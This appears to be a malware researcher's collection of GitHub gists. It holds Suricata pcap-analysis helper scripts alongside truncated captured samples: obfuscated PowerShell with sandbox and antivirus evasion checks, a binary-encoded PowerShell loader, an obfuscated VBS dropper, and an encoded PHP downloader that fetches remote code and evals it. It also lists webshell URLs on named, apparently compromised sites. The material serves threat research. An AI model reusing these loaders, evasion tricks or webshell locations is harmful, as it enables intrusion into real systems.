jstrosch

set log="C:\Users\TheCyberYeti\AppData\Local\Temp\suri"

@echo OFF

echo y | del "%log%\*"

@echo ON

suricata -k none -r %1 --runmode=autofp -l "%log%" -s "C:\Program Files\Suricata\custom.rules"

jstrosch

 $Hl68 =[tyPe]("{2}{9}{5}{1}{7}{4}{6}{0}{8}{3}{10}"-f 'MPR','O.','sY','oN','ssIon.C','tEM.i','o','cOmpRe','ESSi','s','mODe') ; $tEuwx =[Type]("{3}{2}{0}{1}" -F 's','TEm.cONverT','Y','s');   Set  ("{1}{0}"-f'e','PdWj')  ([TYpe]("{2}{3}{0}{1}{4}"-F 'm','.Io','Sy','sTE','.fILe') ) ;  ${s`crip`Tpath} = &("{2}{0}{1}"-f'pli','t-path','s') -parent ${m`Yi`NvoCa`TIoN}."MYC`omM`AND"."d`EFinitI`oN"

if (${sCR`i`P`TPath} -match ("{0}{1}" -f 'av','ast'))    {exit}
if (${SCR`IP`TP`ATh} -match "avg")      {exit}
if (${s`CrIpTp`A`Th} -match ("{1}{0}"-f 'le','samp'))   {exit}
if (${SCr`IPTp`ATH} -match ("{0}{2}{1}" -f'anal','s','ysi')) {exit}
if (${sc`RIpT`paTh} -match ("{1}{2}{0}" -f're','malw','a'))  {exit}
if (${SC`RI`PTP`Ath} -match ("{1}{2}{0}" -f'x','sand','bo'))  {exit}
if (${Sc`Rip`TP`ATh} -match ("{0}{1}" -f 'v','irus'))    {exit}

jstrosch

Discovered through an open directory at: hxxps://instment[.]ga/wipper/
Original hash of attack.txt file (the code here): e7ecdedad56effcf92ba01081441e033e2564e4eb24720de55e6d84858958291

## BEGIN Powershell ##

$t0='QE150'.replace('Q','I').replace('150','x');sal P $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,011

jstrosch

Discovered through an open directory at: hxxp://files.ddrive[.]online/
Original hash of VBS script (MD5): 8a9598f45a06e0c372b19cfacb4bb2a6

## BEGIN VBS ###
On Error Resume Next
bobmarley:tropado7:queroverquempega = "☀☀☀☀☀☀☀":l:cego:bobmarley:tropado7:queroverquempega = "☀☀☀☀☀☀☀":l:cego:
bobmarley:tropado7:queroverquempega = "☀☀☀☀☀☀☀":l:cego:bobmarley:tropado7:queroverquempega = "☀☀☀☀☀☀☀":l:cego:
bobmarley:tropado7:queroverquempega = "☀☀☀☀☀☀☀":l:cego:bobmarley:tropado7:queroverquempega = "☀☀☀☀☀☀☀":l:cego:
bobmarley:tropado7:queroverquempega = "☀☀☀☀☀☀☀":l:cego:bobmarley:tropado7:queroverquempega = "☀☀☀☀☀☀☀":l:cego:
bobmarley:tropado7:queroverquempega = "☀☀☀☀☀☀☀":l:cego:bobmarley:tropado7:queroverquempega = "☀☀☀☀☀☀☀":l:cego:

jstrosch

Initially reported distributing Emotet on URLHaus: https://urlhaus.abuse.ch/browse.php?search=+http%3A%2F%2Fsolr.yakari.id

Discovered through an open directory at: hxxp://solr.yakari[.]id/wp-content/mu-plugins-old/index.php.suspected

Original hash of PHP file: dacc0f895428822979bda234f4f15bfe

## BEGIN PHP ##
$uoeq967= "O)sl 2Te4x-+gazAbuK_6qrjH0RZt*N3mLcVFEWvh;inySJC91oMfYXId5Up.(GP7D,Bw/kQ8";$vpna644='JGNoID0gY3VybF9pbml0KCdodHRwOi8vYmFua3N';$vpna645='zdG9wLnRlY2gvJy4kX0dFVFsnZiddKTtjdXJsX3';$vpna646='NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBT';$vpna647='lNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMo';$vpna648='JGNoKTtldmFsKCc/PicuJHJlc3VsdCk7';$vpna643=$vpna644.$vpna645.$vpna646.$vpna647.$vpna648;function cdim173($fsxi199,$rykc638,$ekcu564){return ''.$fsxi199.''.$rykc638.''.$ekcu564.'';}$qfcg427 = cdim173($uoeq967{34},$uoeq967{13}.$uoeq967{3},$uoeq967{3});$uodu186 = cdim173($uoeq967{19}.$uoeq967{17},$uoeq967{2}.$uoeq967{7},'');$lrbk358 = cdim173($uoeq967{22},$uoeq967{19},$uoeq967{52});$hume205 = cdim173($uoeq967{1

jstrosch

Keybase proof

I hereby claim:

• I am jstrosch on github.
• I am jstrosch (https://keybase.io/jstrosch) on keybase.
• I have a public key ASDkmIOHHVo_eM7no0mxaZUOKWRxavuanSwN1FhI2GLbogo

To claim this, I am signing this object:

jstrosch

#!/usr/bin/env bash

PCAPFILE=$1
LOG_LOCATION='/tmp/suricata/'

if [ -z $PCAPFILE ] || [ ! -f $PCAPFILE ]; then
    echo "File ${PCAPFILE} doesnt seem to be there - please supply a pcap file."
    exit 1;
fi

jstrosch

#!/usr/bin/env bash

SESSION_USER=$(logname)

PCAPFILE=$1

if (( $EUID != 0 )); then
     echo -e "Please run this script as root or with \"sudo\".\n"
     exit 1
fi

jstrosch

#! /bin/sh

set -e

echo "Removing existing dummy interface."
nmcli con delete dummy-dummy0 || true

echo "Adding dummy0."
nmcli con add ifname dummy0 type dummy ipv4.method link-local

jstrosch

<===== WEBSHELLS =====>
	[*] Shell SHA256: 6abf737186523a962f94e0e6b6bed5f5ab9238d3fddfc173d8ef83b67400d4ca
		[HOST] https://regiontreasure.com/js/vendor/option.php
		[HOST] https://reportingdashboard.mobilisedev.co.uk/includes/app.core.php
		[HOST] https://eflcc.in/images/prettyPhoto/dark_rounded/authorize.php
		[HOST] https://chains.lookarma.com.br/wp-includes/sodium_compat/src/Core/Base64/class.core.php
		[HOST] https://reviewgrenade.com/wp-content/themes/blossom-fashion/inc/css/lib.php
		[HOST] https://www.turksagroup.com/wp-content/plugins/redux-framework/redux-core/appsero/app.class.php
		[HOST] https://stockmanager.upd.work/themes/default/views/auth/email/lib.api.php
		[HOST] https://demo.usa-mycard.com/sql/class.cache.php